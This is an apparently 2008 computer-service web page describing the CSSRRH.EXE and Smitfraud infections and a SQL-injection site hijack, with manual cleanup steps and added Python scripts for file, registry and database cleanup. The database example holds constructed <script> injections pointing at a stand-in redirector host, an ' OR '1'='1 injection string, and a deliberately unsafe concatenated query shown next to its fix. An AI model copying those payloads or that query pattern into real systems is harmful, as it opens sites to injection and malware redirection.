
NEW VIRUSES

This week, two of our office computers were hit with a virus, a different one on each computer, both pretty devastating; then, as if that weren't enough, our server was attacked. Both viruses are very destructive to any computer they attach to, shutting it down completely in a very short time.

Initially, we did what most computer-savvy people would do: we checked with the top virus-protection companies. None of Norton, McAfee, Trend Micro or ABG had heard of them or worked up any definitions for them (we run up-to-date protection on all of our computers).

Fortunately, being bit-mechanics ourselves, we set out to restore our computers to some semblance of working order. It took three days to track down all the damage they had done and remove the offending programs.

VIRUS #1
CSSRRH.EXE
(NOTE: here is a link to a temporary patch; we are working on a permanent solution)

Do Not Download Alcatech BPM Studio Pro from www.minova.org (or anywhere until you know it is safe)

DOWNLOAD FIX

This virus is probably piggy-backed on many unsuspecting music and software programs available for download. We acquired ours by downloading Alcatech BPM Studio Pro from www.minova.org. It is very destructive: a module replicates entries in the registry so fast that in about two minutes it overloads the system and shuts the computer down. We have not yet found the module that spawns the child process (CSSRRH.EXE), but we have found a way to stop it from overloading the computer. We suspect that the parent spawner is a DLL.

For those of you tech-savvy enough to work with the registry, here is a quick fix until we find the parent spawner:
If you have a rescue disk, boot from the CD; if you don't, boot into Safe Mode.
Go to Start, click Run, type regedit and press Enter. Search the registry for CSSRRH and delete every instance.
Close regedit, search your computer for CSSRRH.EXE and rename it.
Create a text file containing any message you wish to utter, name it CSSRRH.EXE and save it in the same place the original file was.

This will stop it from damaging your computer.
When you reboot you will see a message saying it cannot install CSSRRH; note the file name that presents that message and delete that file if possible. We will post here when we find the spawner.

Virus #2
Smitfraud

This is a nasty virus that completely devastates your computer. It happened so fast that we still don't know everything that occurred in the first few minutes, but we can tell you where we got it. We were searching for information on "possession of firearms in Texas", hit a forum and clicked on one of the threads. After that it was all over. The only cure for a home PC user who wants to solve it themselves is to back up your data and reformat the hard drive.

Symptoms:

  • Pops up a notice that your computer is infected with 497 (number may vary) pieces of adware.
  • Then a notice to purchase virus protection right now.
  • Then a blue screen carrying the virus-protection ad.
  • It disables the Desktop and Themes tabs in Display Properties so you can't change them.
  • When the computer times out into screen-saver mode, it cycles a fake black screen and error message with a fake reboot, over and over (pressing any key resumes what you were doing).

There are many variations of this virus; this is the most common one. Smitfraud installs itself the instant you click an infected link, and these links are often disguised as the answer to a search query. The first evidence is the famous blue screen: an error message that mimics Microsoft Windows errors. You then get pop-ups advertising a virus removal that will "fix your computer"; clicking on it only gets you in deeper. These alerts are designed to scare a PC user into buying the crooks' spyware-protection software. The virus can replace many of your important Windows files with infected ones.

Here are some of the DLL files it installs on your computer: iereport.dll, ossmart.dll, tlhelp.dll, mssms.dll, vpnconfig.dll, wmpdev.dll, wmphost.dll, advsort.dll.
These executables are also commonly found: wincrt.exe, intell321.exe, m00.exe, policyverifier.exe, printer.exe, psguard.exe, svchost.exe, sysmonms.exe, winntify.exe, intel32.exe, zloader3.exe. Note that svchost.exe is also the name of a legitimate Windows system file; a copy sitting outside the Windows system folder is the suspicious one, not the one that belongs there.

Call us; we can help you get rid of this one.

If you have more info on removing this one, email us so we can post it.
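The CSSRRH.EXE steps above (search the registry for the name, find the file, rename it and leave a harmless text file in its place) and the Smitfraud file list are both searches by name, so here is one script that does both. This is an added example, not the patch linked above and not anything the authors used: it assumes Python 3, the registry walk needs Windows (the winreg module), the file names are the ones quoted on this page, and the demo directory it builds is constructed so the sweep can be tried anywhere before it is pointed at a real drive. One step beyond the text: the decoy is made read-only so the still-unidentified spawner cannot simply overwrite it.

```python
import os
import stat
import tempfile

try:
    import winreg  # Windows only; the registry walk below needs it
except ImportError:
    winreg = None

# File names quoted on this page: the CSSRRH spawn plus the Smitfraud drop list.
# svchost.exe is also a legitimate Windows binary, so the sweep only reports
# paths; deciding what to quarantine is left to whoever reads the list.
SUSPECT_NAMES = {
    "cssrrh.exe", "wincrt.exe", "intell321.exe", "m00.exe", "policyverifier.exe",
    "printer.exe", "psguard.exe", "svchost.exe", "sysmonms.exe", "winntify.exe",
    "intel32.exe", "zloader3.exe", "iereport.dll", "ossmart.dll", "tlhelp.dll",
    "mssms.dll", "vpnconfig.dll", "wmpdev.dll", "wmphost.dll", "advsort.dll",
}


def find_files(roots, names=SUSPECT_NAMES):
    """Walk each root and return every path whose file name is in `names` (case-insensitive)."""
    wanted = {n.lower() for n in names}
    found = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            found.extend(os.path.join(dirpath, f) for f in files if f.lower() in wanted)
    return sorted(found)


def quarantine_and_decoy(path, note="Decoy left by cleanup; the original was renamed."):
    """Rename the executable and leave a read-only text file under its old name, so a
    spawner that relaunches it by name runs a harmless file. Returns the quarantine path."""
    quarantined = path + ".quarantined"
    os.rename(path, quarantined)
    with open(path, "w") as decoy:
        decoy.write(note + "\n")
    os.chmod(path, stat.S_IREAD)  # read-only (on Windows this sets the read-only attribute)
    return quarantined


def _walk_key(hive, hive_name, subkey, marker, hits):
    try:
        key = winreg.OpenKey(hive, subkey, 0, winreg.KEY_READ)
    except OSError:
        return  # no permission, or the key vanished; skip it
    with key:
        index = 0
        while True:  # values stored directly under this key
            try:
                name, data, _kind = winreg.EnumValue(key, index)
            except OSError:
                break
            if marker in name.upper() or marker in str(data).upper():
                hits.append((hive_name + "\\" + subkey, name, str(data)))
            index += 1
        index = 0
        while True:  # then recurse into each subkey
            try:
                child = winreg.EnumKey(key, index)
            except OSError:
                break
            _walk_key(hive, hive_name, (subkey + "\\" + child) if subkey else child, marker, hits)
            index += 1


def scan_registry(marker="CSSRRH"):
    """Windows only: the scripted form of 'search regedit for CSSRRH'. Returns
    (key path, value name, data) for every value whose name or data mentions the marker."""
    if winreg is None:
        raise RuntimeError("the registry scan needs Windows (winreg is unavailable)")
    hits = []
    for hive_name in ("HKEY_LOCAL_MACHINE", "HKEY_CURRENT_USER"):
        _walk_key(getattr(winreg, hive_name), hive_name, "", marker.upper(), hits)
    return hits


def demo_sweep():
    """Build a constructed directory (plain text files, not real malware), sweep it and
    quarantine the CSSRRH hit. Returns (file names found, quarantine copy exists, decoy read-only)."""
    root = tempfile.mkdtemp(prefix="sweep-demo-")
    os.makedirs(os.path.join(root, "Temp"))
    for rel in ("CSSRRH.EXE", os.path.join("Temp", "intel32.exe"), "notes.txt"):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("constructed sample, not an executable\n")
    found = find_files([root])
    target = next(p for p in found if os.path.basename(p).lower() == "cssrrh.exe")
    quarantined = quarantine_and_decoy(target)
    read_only = not (os.stat(target).st_mode & stat.S_IWUSR)
    return [os.path.basename(p) for p in found], os.path.exists(quarantined), read_only


if __name__ == "__main__":
    print(demo_sweep())
    if winreg is not None:
        for key_path, value_name, data in scan_registry():
            print(key_path, value_name, data)
```

From Safe Mode, run scan_registry() first and review the list before deleting entries in regedit as the text describes; then find_files([r'C:\']) for the file search, and quarantine_and_decoy() only on hits you have looked at, since a svchost.exe in the system folder is the real one.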

Virus #3
WEBSITE HIJACKER
ASCII Encoded/Binary String Automated SQL Injection Attack

This information is only useful to those whose website is database-driven, most likely on MS SQL Server or MySQL. We discovered our problem when page refreshes on our site took forever to load. Soon after, Google quarantined our site, warning that visitors following the link to our site were being redirected to a malware site.

What we discovered was that our database had been hacked and a <script> tag had been inserted after each category in our menu system. The script redirected the visitor to five other sites that contained malware. These low-lifes rotate the sites they include in the string, so publishing a list won't help you. This is not only a way of passing on malware but a way of driving hits to their sites. Once we found the script, the cure was just the time-consuming job of opening each menu item in the database and deleting the script. We suspect the intruder got in through our back office. Injection of this kind enters through a page that builds its SQL from form or URL input, so if your e-commerce site keeps a database-driven inventory behind a content management system, make sure it is as bullet-proof as you possibly can: parameterized queries instead of SQL glued together from input, and a database account with only the rights the site needs.
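What the cleanup and the fix look like in code, as an added example that is not the authors' site or database: it uses Python's built-in SQLite in memory to stand in for MS SQL Server or MySQL, the menu table and its column names are assumptions, and the two rows carrying a <script> tag are constructed to look like the damage described above. It goes one step past the text by also showing the back-office lookup pattern that lets a quote in user input become SQL, next to the parameterized form that does not.

```python
import re
import sqlite3

# Matches a whole injected <script ...>...</script> element, in any letter case.
SCRIPT_TAG = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.IGNORECASE | re.DOTALL)

# Text columns of the (assumed) menu table that the CMS writes and the site renders.
MENU_TEXT_COLUMNS = ("category", "description")


def build_sample_db():
    """Constructed in-memory copy of a menu table with two rows already hit."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE menu (id INTEGER PRIMARY KEY, category TEXT, description TEXT)")
    conn.executemany("INSERT INTO menu (category, description) VALUES (?, ?)", [
        ("DPS Consulting", "On-site computer service"),
        ('Classes<script src="http://redirector.invalid/r.js"></script>', "Computer classes"),
        ("Website Creation", 'Design and hosting<SCRIPT>window.location="http://redirector.invalid/"</SCRIPT>'),
    ])
    conn.commit()
    return conn


def find_injected(conn, table="menu", columns=MENU_TEXT_COLUMNS):
    """Return (column, id, value) for every cell that carries a <script tag."""
    hits = []
    for col in columns:
        # Table and column names are our own constants, never user input; the
        # search pattern travels as a bound parameter, which is the point of the fix below.
        cur = conn.execute(f'SELECT id, "{col}" FROM "{table}" WHERE "{col}" LIKE ?', ("%<script%",))
        hits.extend((col, row_id, value) for row_id, value in cur)
    return hits


def clean_injected(conn, table="menu", columns=MENU_TEXT_COLUMNS):
    """Strip the injected tags in place; returns the number of cells rewritten.
    The target hosts rotate, so the regex keys on the tag itself, not on any URL."""
    rewritten = 0
    for col, row_id, value in find_injected(conn, table, columns):
        fixed = SCRIPT_TAG.sub("", value)
        if fixed != value:
            conn.execute(f'UPDATE "{table}" SET "{col}" = ? WHERE id = ?', (fixed, row_id))
            rewritten += 1
    conn.commit()
    return rewritten


def lookup_category_unsafe(conn, name):
    """The back-office pattern that lets input become SQL: string concatenation."""
    sql = "SELECT id FROM menu WHERE category = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_category_safe(conn, name):
    """The same lookup with the value bound as a parameter; a quote is just a quote."""
    return [row[0] for row in conn.execute("SELECT id FROM menu WHERE category = ?", (name,))]


if __name__ == "__main__":
    db = build_sample_db()
    print("injected cells:", find_injected(db))
    print("unsafe lookup with ' OR '1'='1 returns", lookup_category_unsafe(db, "' OR '1'='1"))
    print("safe lookup with the same input returns", lookup_category_safe(db, "' OR '1'='1"))
    print("cells cleaned:", clean_injected(db))
```

Against a real MySQL or SQL Server database the same find-then-strip pass works with the driver's own placeholder syntax; run it over every text column the site renders, not just the menu, and take a backup first so a regex mistake can be undone.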

What we are describing is the simplest form of intrusion by these pirates. If the attack on your system is more complex than this, have your programmer visit the following site for a more in-depth explanation and cure.

http://www.bloombit.com/

Lee & Dan Siemon
281.528.1247 Home, office
717.645.9282 Cell

Or Email:

The DPS Group.net


We provide computer service, training and computer tune-up to the North Houston area and Montgomery County Texas, including but not limited to, Spring Texas, The Woodlands Texas, Conroe Texas, Willis Texas, Montgomery Texas, Tomball Texas, Humble Texas, Kingwood Texas, Cleveland Texas (Liberty County) and all points in between. If we missed yours, give us a call.

Copyright The DPS Group, LLC 2008